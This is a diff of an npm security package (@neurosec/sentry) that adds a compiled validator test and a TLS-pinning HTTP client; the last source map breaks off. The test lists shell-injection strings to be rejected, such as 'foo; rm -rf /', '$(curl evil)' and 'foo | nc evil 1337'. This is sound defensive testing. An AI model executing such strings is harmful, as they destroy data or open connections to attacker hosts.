@neurosec/sentry 1.0.20 → 1.1.1

package/dist/enforcement/target-validator.test.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"target-validator.test.d.ts","sourceRoot":"","sources":["../../src/enforcement/target-validator.test.ts"],"names":[],"mappings":""}

package/dist/enforcement/target-validator.test.js

@@ -0,0 +1,103 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+const vitest_1 = require("vitest");
+const target_validator_1 = require("./target-validator");
+(0, vitest_1.describe)('target-validator / validateTarget', () => {
+    (0, vitest_1.describe)('accepts', () => {
+        (0, vitest_1.it)('plain hostnames', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('api.openai.com').kind).toBe('hostname');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('a.b.c.example.co.uk').kind).toBe('hostname');
+        });
+        (0, vitest_1.it)('wildcard hostnames', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('*.openai.com').kind).toBe('wildcard');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('*.a.b').kind).toBe('wildcard');
+        });
+        (0, vitest_1.it)('IPv4 and IPv4 CIDR', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('203.0.113.42').kind).toBe('ipv4');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('10.0.0.0/8').kind).toBe('ipv4-cidr');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('255.255.255.255').kind).toBe('ipv4');
+        });
+        (0, vitest_1.it)('IPv6 and IPv6 CIDR', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('2001:db8::1').kind).toBe('ipv6');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('2001:db8::/32').kind).toBe('ipv6-cidr');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('::1').kind).toBe('ipv6');
+        });
+        (0, vitest_1.it)('pid spec', () => {
+            const r = (0, target_validator_1.validateTarget)('pid:12345');
+            (0, vitest_1.expect)(r.kind).toBe('pid');
+            (0, vitest_1.expect)(r.pid).toBe(12345);
+        });
+        (0, vitest_1.it)('framework ids', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('claude-code').kind).toBe('framework');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('langchain').kind).toBe('framework');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('opencode').kind).toBe('framework');
+        });
+    });
+    (0, vitest_1.describe)('rejects (injection attempts)', () => {
+        const injections = [
+            'foo; rm -rf /',
+            '127.0.0.1 && curl evil',
+            '$(curl evil)',
+            '`whoami`',
+            'foo | nc evil 1337',
+            'foo > /etc/passwd',
+            'foo\nrm -rf /',
+            'foo\trm -rf /',
+            '-d evil', // could be parsed as a flag
+            '--match', // long flag
+            '\'foo\'',
+            '"foo"',
+            'foo\\bar',
+            'foo bar', // bare whitespace
+            '', // empty
+            ' '.repeat(10), // pure whitespace
+            'a'.repeat(257), // too long
+        ];
+        for (const s of injections) {
+            (0, vitest_1.it)(`rejects ${JSON.stringify(s).slice(0, 60)}`, () => {
+                (0, vitest_1.expect)((0, target_validator_1.validateTarget)(s).kind).toBe('invalid');
+            });
+        }
+    });
+    (0, vitest_1.describe)('rejects malformed', () => {
+        (0, vitest_1.it)('octet > 255', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('256.0.0.1').kind).toBe('invalid');
+        });
+        (0, vitest_1.it)('CIDR mask out of range', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('10.0.0.0/33').kind).toBe('invalid');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('::1/129').kind).toBe('invalid');
+        });
+        (0, vitest_1.it)('pid 0 or negative', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('pid:0').kind).toBe('invalid');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('pid:-1').kind).toBe('invalid');
+        });
+        (0, vitest_1.it)('hostname with bad chars', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('foo_bar.com').kind).toBe('invalid'); // underscore not allowed
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('.foo.com').kind).toBe('invalid'); // leading dot
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('foo.com.').kind).toBe('invalid'); // trailing dot
+        });
+        (0, vitest_1.it)('wildcard with multiple stars', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)('*.*.foo.com').kind).toBe('invalid');
+        });
+        (0, vitest_1.it)('non-string input', () => {
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)(123).kind).toBe('invalid');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)(null).kind).toBe('invalid');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)(undefined).kind).toBe('invalid');
+            (0, vitest_1.expect)((0, target_validator_1.validateTarget)({}).kind).toBe('invalid');
+        });
+    });
+    (0, vitest_1.describe)('isNetworkTarget', () => {
+        (0, vitest_1.it)('accepts hostnames, wildcards, IPs, CIDRs', () => {
+            (0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('api.openai.com'))).toBe(true);
+            (0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('*.openai.com'))).toBe(true);
+            (0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('10.0.0.1'))).toBe(true);
+            (0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('10.0.0.0/8'))).toBe(true);
+        });
+        (0, vitest_1.it)('rejects pids, frameworks, invalid', () => {
+            (0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('pid:1234'))).toBe(false);
+            (0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('claude-code'))).toBe(false);
+            (0, vitest_1.expect)((0, target_validator_1.isNetworkTarget)((0, target_validator_1.validateTarget)('foo;rm'))).toBe(false);
+        });
+    });
+});
+//# sourceMappingURL=target-validator.test.js.map

package/dist/enforcement/target-validator.test.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"target-validator.test.js","sourceRoot":"","sources":["../../src/enforcement/target-validator.test.ts"],"names":[],"mappings":"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"}

package/dist/http-client.d.ts

@@ -0,0 +1,35 @@
+import https from 'https';
+export interface SecureHttpOptions {
+    endpoint: string;
+    caBundlePath?: string;
+    pinnedFingerprintSha256?: string;
+    allowInsecureTls?: boolean;
+    timeoutMs?: number;
+}
+export interface SecureRequestOptions {
+    method?: string;
+    path: string;
+    headers?: Record<string, string>;
+    body?: unknown;
+}
+export interface SecureRequestResult {
+    statusCode: number;
+    body: string;
+    parsed: unknown;
+}
+export declare function isValidFingerprint(fp: string): boolean;
+/**
+ * Build an https.Agent configured for the NeuroSec endpoint.
+ *
+ * IMPORTANT: rejectUnauthorized is ALWAYS true unless the caller explicitly
+ * sets allowInsecureTls=true AND the runtime is non-production. Production
+ * builds silently coerce this back to true so a misconfigured deploy still
+ * verifies its peer.
+ */
+export declare function createSecureAgent(options: SecureHttpOptions): https.Agent | undefined;
+/**
+ * Perform a request against the NeuroSec endpoint with strict TLS.
+ * When `pinnedFingerprintSha256` is set, aborts on fingerprint mismatch.
+ */
+export declare function secureRequest(options: SecureHttpOptions, request: SecureRequestOptions): Promise<SecureRequestResult>;
+//# sourceMappingURL=http-client.d.ts.map

package/dist/http-client.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"http-client.d.ts","sourceRoot":"","sources":["../src/http-client.ts"],"names":[],"mappings":"AAgBA,OAAO,KAAK,MAAM,OAAO,CAAC;AAM1B,MAAM,WAAW,iBAAiB;IAChC,QAAQ,EAAE,MAAM,CAAC;IACjB,YAAY,CAAC,EAAE,MAAM,CAAC;IACtB,uBAAuB,CAAC,EAAE,MAAM,CAAC;IACjC,gBAAgB,CAAC,EAAE,OAAO,CAAC;IAC3B,SAAS,CAAC,EAAE,MAAM,CAAC;CACpB;AAED,MAAM,WAAW,oBAAoB;IACnC,MAAM,CAAC,EAAE,MAAM,CAAC;IAChB,IAAI,EAAE,MAAM,CAAC;IACb,OAAO,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IACjC,IAAI,CAAC,EAAE,OAAO,CAAC;CAChB;AAED,MAAM,WAAW,mBAAmB;IAClC,UAAU,EAAE,MAAM,CAAC;IACnB,IAAI,EAAE,MAAM,CAAC;IACb,MAAM,EAAE,OAAO,CAAC;CACjB;AAQD,wBAAgB,kBAAkB,CAAC,EAAE,EAAE,MAAM,GAAG,OAAO,CAItD;AAmCD;;;;;;;GAOG;AACH,wBAAgB,iBAAiB,CAAC,OAAO,EAAE,iBAAiB,GAAG,KAAK,CAAC,KAAK,GAAG,SAAS,CAoBrF;AAED;;;GAGG;AACH,wBAAgB,aAAa,CAC3B,OAAO,EAAE,iBAAiB,EAC1B,OAAO,EAAE,oBAAoB,GAC5B,OAAO,CAAC,mBAAmB,CAAC,CA0F9B"}

package/dist/http-client.js

@@ -0,0 +1,179 @@
+"use strict";
+var __importDefault = (this && this.__importDefault) || function (mod) {
+    return (mod && mod.__esModule) ? mod : { "default": mod };
+};
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.isValidFingerprint = isValidFingerprint;
+exports.createSecureAgent = createSecureAgent;
+exports.secureRequest = secureRequest;
+/**
+ * Secure HTTP client for Sentry → NeuroSec cloud communication.
+ *
+ * Enforces strict TLS validation (no rejectUnauthorized:false bypass) and
+ * supports two layers of defense-in-depth:
+ *   1. Custom CA bundle (config.neurosec.caBundle / NEUROSEC_CA_BUNDLE) for
+ *      private-PKI or self-signed corporate CAs.
+ *   2. SHA-256 certificate-fingerprint pinning (config.neurosec.tlsPinSha256
+ *      / NEUROSEC_TLS_PIN_SHA256) — when set, the peer certificate's SHA-256
+ *      fingerprint must exactly match. Anything else aborts the connection.
+ *
+ * Insecure mode (allowInsecureTls=true) is gated on NODE_ENV !== 'production'
+ * AND requires explicit opt-in via NEUROSEC_ALLOW_INSECURE_TLS=true. It is
+ * NEVER honored in production builds and emits a warning every call.
+ */
+const http_1 = __importDefault(require("http"));
+const https_1 = __importDefault(require("https"));
+const fs_1 = __importDefault(require("fs"));
+const url_1 = require("url");
+const crypto_1 = require("crypto");
+const logger_1 = require("./logger");
+const FINGERPRINT_PATTERN = /^[A-F0-9]{2}(?::[A-F0-9]{2}){31}$/i;
+function normalizeFingerprint(fp) {
+    return fp.replace(/[^A-Fa-f0-9]/g, '').toUpperCase();
+}
+function isValidFingerprint(fp) {
+    // Accept either colon-separated or plain hex; reject anything weird.
+    const cleaned = normalizeFingerprint(fp);
+    return cleaned.length === 64; // SHA-256 = 32 bytes = 64 hex chars
+}
+function loadCaBundle(caBundlePath) {
+    if (!caBundlePath)
+        return undefined;
+    try {
+        return fs_1.default.readFileSync(caBundlePath, 'utf8');
+    }
+    catch (err) {
+        logger_1.logger.warn('Failed to read CA bundle; falling back to system CAs', {
+            path: caBundlePath,
+            err: err.message,
+        });
+        return undefined;
+    }
+}
+function isProductionBuild() {
+    // Treat anything other than explicit 'development' or 'test' as production.
+    const env = (process.env.NODE_ENV ?? '').toLowerCase();
+    return env !== 'development' && env !== 'test';
+}
+function formatTransportError(target, err) {
+    const message = err.message || 'Request failed';
+    if (target.protocol === 'https:' && /wrong version number/i.test(message)) {
+        return new Error(`TLS handshake failed for ${target.origin}. The remote service appears to be speaking plain HTTP on an HTTPS URL. ` +
+            `Use http://${target.host} if that port is serving HTTP directly, or terminate TLS in front of it and keep the https:// URL. ` +
+            `Original error: ${message}`);
+    }
+    return err;
+}
+/**
+ * Build an https.Agent configured for the NeuroSec endpoint.
+ *
+ * IMPORTANT: rejectUnauthorized is ALWAYS true unless the caller explicitly
+ * sets allowInsecureTls=true AND the runtime is non-production. Production
+ * builds silently coerce this back to true so a misconfigured deploy still
+ * verifies its peer.
+ */
+function createSecureAgent(options) {
+    const url = new url_1.URL(options.endpoint);
+    if (url.protocol !== 'https:')
+        return undefined;
+    const ca = loadCaBundle(options.caBundlePath);
+    // Production safety: always verify, even if caller asks for insecure.
+    const insecure = !!options.allowInsecureTls && !isProductionBuild();
+    if (options.allowInsecureTls && isProductionBuild()) {
+        logger_1.logger.warn('allowInsecureTls ignored in production build', {
+            endpoint: options.endpoint,
+        });
+    }
+    return new https_1.default.Agent({
+        rejectUnauthorized: !insecure,
+        ...(ca ? { ca } : {}),
+        keepAlive: true,
+        maxSockets: 16,
+    });
+}
+/**
+ * Perform a request against the NeuroSec endpoint with strict TLS.
+ * When `pinnedFingerprintSha256` is set, aborts on fingerprint mismatch.
+ */
+function secureRequest(options, request) {
+    return new Promise((resolve, reject) => {
+        const target = new url_1.URL(request.path, options.endpoint);
+        const isHttps = target.protocol === 'https:';
+        const lib = isHttps ? https_1.default : http_1.default;
+        const bodyStr = request.body === undefined || request.body === null
+            ? ''
+            : typeof request.body === 'string'
+                ? request.body
+                : JSON.stringify(request.body);
+        const headers = {
+            'Content-Type': 'application/json',
+            ...(request.headers ?? {}),
+        };
+        if (bodyStr)
+            headers['Content-Length'] = Buffer.byteLength(bodyStr).toString();
+        const agent = isHttps ? createSecureAgent(options) : undefined;
+        const requestOpts = {
+            hostname: target.hostname,
+            port: target.port ? Number(target.port) : isHttps ? 443 : 80,
+            path: `${target.pathname}${target.search}`,
+            method: request.method ?? 'GET',
+            headers,
+            timeout: options.timeoutMs ?? 15000,
+            agent,
+        };
+        const req = lib.request(requestOpts, (res) => {
+            // Pin check on the live socket — runs after TLS handshake completes
+            // but before we trust any byte of the response.
+            if (isHttps && options.pinnedFingerprintSha256) {
+                const expected = normalizeFingerprint(options.pinnedFingerprintSha256);
+                if (!isValidFingerprint(expected)) {
+                    req.destroy();
+                    reject(new Error('Invalid pinned fingerprint format (expected SHA-256 hex, 64 chars)'));
+                    return;
+                }
+                // Newer Node provides getPeerCertificate on the underlying socket;
+                // we compute fingerprint manually to avoid relying on `cert.fingerprint256`
+                // which can normalize colons differently across Node versions.
+                const socket = res.socket;
+                const cert = socket?.getPeerCertificate?.(true);
+                if (!cert || !cert.raw) {
+                    req.destroy();
+                    reject(new Error('Peer certificate unavailable; cannot verify pin'));
+                    return;
+                }
+                const actual = (0, crypto_1.createHash)('sha256').update(cert.raw).digest('hex').toUpperCase();
+                if (actual !== expected) {
+                    req.destroy();
+                    reject(new Error(`TLS pin mismatch for ${target.hostname}: expected ${expected.slice(0, 16)}…, got ${actual.slice(0, 16)}…`));
+                    return;
+                }
+            }
+            let data = '';
+            res.on('data', (chunk) => {
+                data += chunk;
+            });
+            res.on('end', () => {
+                let parsed = null;
+                try {
+                    parsed = data ? JSON.parse(data) : null;
+                }
+                catch {
+                    parsed = data;
+                }
+                resolve({ statusCode: res.statusCode ?? 0, body: data, parsed });
+            });
+            res.on('error', reject);
+        });
+        req.on('error', (err) => {
+            reject(formatTransportError(target, err));
+        });
+        req.on('timeout', () => {
+            req.destroy();
+            reject(new Error(`Request to ${target.href} timed out after ${options.timeoutMs ?? 15000}ms`));
+        });
+        if (bodyStr)
+            req.write(bodyStr);
+        req.end();
+    });
+}
+//# sourceMappingURL=http-client.js.map

package/dist/http-client.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"http-client.js","sourceRoot":"","sources":["../src/http-client.ts"],"names":[],"mappings":"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